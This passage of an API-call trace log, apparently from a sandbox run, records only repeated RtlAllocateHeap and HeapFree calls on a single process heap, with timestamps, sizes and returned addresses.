dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0035.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103cf8 | out: hHeap=0xe0000) returned 1 [0035.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0035.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0035.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0035.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108130 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1081c0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1080a0 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108490 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108520 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109258 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b48 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103bf0 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0035.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105e80 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103bf0 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b48 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0035.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0035.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106300 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105e80 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109140 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0035.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0035.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | 